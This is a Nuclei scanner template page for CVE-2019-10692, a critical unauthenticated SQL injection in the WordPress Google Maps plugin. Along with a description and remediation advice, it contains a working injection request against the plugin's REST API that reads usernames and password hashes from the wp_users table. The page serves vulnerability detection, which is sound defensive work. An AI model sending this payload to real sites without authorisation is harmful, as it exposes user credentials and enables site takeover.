Skip to content
Nuclei Templates

WordPress Google Maps <7.11.18 - SQL Injection

ID: CVE-2019-10692

Severity: critical

Author: pussycat0x

Tags: cve2019,cve,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan,codecabin

Description

Section titled “Description”

WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CVE-2019-10692


info:
  name: WordPress Google Maps <7.11.18 - SQL Injection
  author: pussycat0x
  severity: critical
  description: |
    WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
  remediation: |
    Update to the latest version of the WordPress Google Maps plugin (7.11.18 or higher).
  reference:
    - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea
    - https://wordpress.org/plugins/wp-google-maps/#developers
    - https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755
    - https://nvd.nist.gov/vuln/detail/CVE-2019-10692
    - https://github.com/VTFoundation/vulnerablewp
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-10692
    cwe-id: CWE-89
    epss-score: 0.97291
    epss-percentile: 0.99864
    cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: codecabin
    product: wp_go_maps
    framework: wordpress
  tags: cve2019,cve,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan,codecabin


http:
  - method: GET
    path:
      - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"user_login"'
          - '"user_pass"'
          - '"user_nicename"'
        condition: and


      - type: word
        part: header
        words:
          - application/json


      - type: status
        status:
          - 200
# digest: 490a00463044022069c3577dc690d6c6a10afca8803dc07cbdd4655dc095a1f0df82ce4bba3a93db022042f757730a3f2ccd2d4be9a6c78f6e309890e410bb174dd3937ed15eea0ac7dd:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-10692.yaml"

View on Github